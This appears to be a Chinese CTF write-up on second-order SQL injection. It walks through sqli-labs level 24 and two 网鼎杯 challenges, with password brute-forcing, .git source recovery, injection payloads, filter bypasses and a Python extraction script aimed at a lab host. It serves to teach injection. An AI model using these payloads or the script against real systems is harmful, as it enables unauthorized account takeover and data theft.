目录

二次注入

sql靶场第24关

网鼎杯comment二次注入

网鼎杯-2018-Web-Unfinish

二次注入

sql靶场第24关

二次注入我觉得是特别有意思，首先依然是查看页面

可以看出来这一关十分的丰富，可以注册，修改和登录，那我们先试着注册一个用户吧

这一套下来之后，我登录成功后可以改密码。

我们思考一下，每一个系统都应该有普通用户和管理员用户，管理员用户可以管理普通用户。我们现在是创建了一个普通用户，是没有权限查看其他用户的。但是管理员账户是可以查看其他用户的，如果我们能够得到管理员账户，那不就可以随意查看其他用户了吗？这就是这一关的目标，想办法弄到管理员账户。 一般管理员账户的用户名不是 admin就是root， 这里我就先拿admin试试。因为刚刚插入数据成功了，说明我们在新建用户的时候肯定是和后台数据库有交互的。

我们查看源代码看看到底是原理，那就按照刚刚的流程来看源代码，先是创建的源码，而查看后发现就是正常的创建。但是创建完成后有一个这个页面，我们看看这个的源码

很明显这个源码的这部分内容是当我们输入一个新用户的时候首先检查用户名有没有重名。

这条语句就是插入语句。虽然对我们输入的注入语句进行过滤，但也只是让特殊符号无效化，并没有给我们直接删除，这也造成了二次注入的漏洞。

接下来我们审计一下login的源码吧

这个页面就是我们的报错页面，当你输入注入点的时候就会出现这个页面，从这段代码可以看到，当我们输入一些数据的时候都会调用这个文件，而这个文件会对我们输入的数据进行过滤，使用 mysql_real_escape_string() 函数进行过滤，该函数的作用是转义 SQL 语句中使用的字符串中的特殊字符

接下来我们分析 pass_change.php 文件，也就是修改密码的后台文件：

 从这段代码可以看到，在修改密码的时候对密码的输入框使用函数mysql_real_escape_string() 进行了过滤，但是对用户名却没有做任何过滤处理，直接就带入到后面的 Update 更新语句进行了更新，因为我们输入的用户名是 admin'# 当被带入到更新语句后实际执行的语句是：

  # 后面的语句都被注释了，所以后台真正执行的语句是：

$sql = "UPDATE users SET PASSWORD='2' where username='admin';

这条语句的意思是更新用户 admin 的密码为2。这样我们就成功修改了管理员用户的密码。

很明显我们成功的修改了管理员的密码啦

接下来，完整的过程来一遍，就拿admin1账号来一遍

首先创建用户

接下来，登录

之后就是改密码

根据我上面的分析，我们最后就可以成功修改admin1的密码啦

证明我们二次注入成功啦。接下来我们实战两道ctf的二次注入题吧。

网鼎杯comment二次注入

查看页面

进入页面发现只有发帖，那我们是这发一个帖子，结果需要登录，看样子是只需要爆破后三位数字密码，那我们就用bp来解决这个问题吧。

由此可见，密码后三位是666。

登录后发帖结果

发现没有啥注入点，这个时候我们只能扫一下这个目录下还有啥文件，这里我使用dirmap扫的，发现在根目录下有个.git,

这里体现出来git泄露，我使用githacker进行文件恢复，得到源码。

<code>//write_do.php

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

header("Location: ./login.php");

die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

$category = addslashes($_POST['category']);

$title = addslashes($_POST['title']);

$content = addslashes($_POST['content']);

$sql = "insert into board

set category = '$category',

title = '$title',

content = '$content'";

$result = mysql_query($sql);

header("Location: ./index.php");

break;

case 'comment':

$bo_id = addslashes($_POST['bo_id']);

$sql = "select category from board where id='$bo_id'";code>

$result = mysql_query($sql);

$num = mysql_num_rows($result);

if($num>0){

$category = mysql_fetch_array($result)['category'];

$content = addslashes($_POST['content']);

$sql = "insert into comment

set category = '$category',

content = '$content',

bo_id = '$bo_id'";

$result = mysql_query($sql);

}

header("Location: ./comment.php?id=$bo_id");

break;

default:

header("Location: ./index.php");

}

}

else{

header("Location: ./index.php");

}

?>

我们根据代码看到addslashes给每个参数都进行了处理，但是数据库存入数据时会自动过滤，将转义字符丢弃，也就是数据还是会原样进入到数据库中。write下边，所有可控制的值都被addslashes转义了。但是comment下边，它把category值重新选取出来，并且没有进行过滤就带入了sql语句。很明显，这就是我们要找的注入点。这里注入就一定要绕过单引号。而write是指发帖，comment指发送评论。

 即使在write下单引号被转义。但是那个单引号再次被数据库选出来时，它又恢复了单引号的特殊含义。 现在category='1',content=database()。/*是php的注释符，将后边的引号注释掉。但是这么注释存在问题，我们构造了一个content，当然/*也要闭合掉一个content。

在留言那里闭合之后，爆出来了数据库名

*/#

<code>#注册

insert into tables values('$email','$username','$password')

#payload

insert into tables values('$email','0' +(select ascii(database())) +'0','$password')

开始注入

0' +(select ascii(database())) +'0

我们发现是119，对应解出来就是“w”，看来我们已经注入成功了，那么就继续注入，

<code>0'+(select ascii(substr (database(),2,1)))+'0

发现了有意思的东西，这不就代表有过滤吗，跟上一次注册语句发现多了一个逗号，很明显逗号被过滤了，但是我们现在不知道还有啥被过滤了，所以我使用burpsuite的暴力破解模块看还有什么被过滤啦，因为我用的只是针对我们需要用到的东西进行过滤，information库是为了方便我们后续注入表名、列名，sys是当information不能使用之后查表名、列名所要用到的库，这样可以花费很少的时间解出这道题。

很明显这道题过滤了“，”和“information”。既然知道过滤了什么，我就尝试着绕过这些过滤，很明显我们第二个payload中的“，”是最容易绕过的，以下是我的绕过

<code>0'+(select ascii(substr(database()from 2 for 1)))+'0

尝试看可不可以绕过

结果显而易见，我们绕过了“，”，继续进行

<code>0'+(select ascii(substr(database()from 3 for 1)))+'0

<code>0'+(select ascii(substr(database()from 4 for 1)))+'0

很明显我们的数据库就是119,101,98啦，查看ascii表后，直接得出答案web因为我们的information被过滤啦，所以我们只能使用sys进行表名爆破

<code>0'+（select ascii(substr(table_name from 1 for 1 )) from sys.x$schema_table_statistics limit 1）+'0

由于这个页面输入框有长度限制，所以我使用猜测的方法，我猜测表名为flag，接下来就是拿到flag啦，这里我用Python脚本来拿flag

<code>import requests

from bs4 import BeautifulSoup

def select_database():

database = ""

for i in range(100):

data_register = {

"email": "%d@qq.com" % (i),

"username": f"0'+(select ascii(substr(database()from {i + 1} for 1)))+'0",

"password": "%d" % (i)

}

register = requests.post(url="http://ea3d107a-e6fa-4fab-ae04-3ab45456f123.node5.buuoj.cn:81/register.php",code>

data=data_register)

data_login = {

"email": "%d@qq.com" % (i),

"password": "%d" % (i)

}

login = requests.post(url="http://ea3d107a-e6fa-4fab-ae04-3ab45456f123.node5.buuoj.cn:81/login.php",code>

data=data_login)

html = login.text

soup = BeautifulSoup(html, 'html.parser')

getUsername = soup.find_all('span')[0]

username = getUsername.text

o = int(username)

if o == 0:

break

database += chr(int(username))

print(database)

return database

def select_flag():

flag = ""

for i in range(100):

data_register = {

"email": "%d@qqq.com" % (i),

"username": f"0'+ascii(substr((select * from flag) from {i + 1} for 1))+'0",

"password": "%d" % (i)

}

register = requests.post(url="http://ea3d107a-e6fa-4fab-ae04-3ab45456f123.node5.buuoj.cn:81/register.php",code>

data=data_register)

data_login = {

"email": "%d@qqq.com" % (i),

"password": "%d" % (i)

}

login = requests.post(url="http://ea3d107a-e6fa-4fab-ae04-3ab45456f123.node5.buuoj.cn:81/login.php",code>

data=data_login)

html = login.text

soup = BeautifulSoup(html, 'html.parser')

getUsername = soup.find_all('span')[0]

username = getUsername.text

o = int(username)

if o == 0:

break

flag += chr(int(username))

print(flag)

print(select_database())

print(select_flag())

结果

成功拿到flag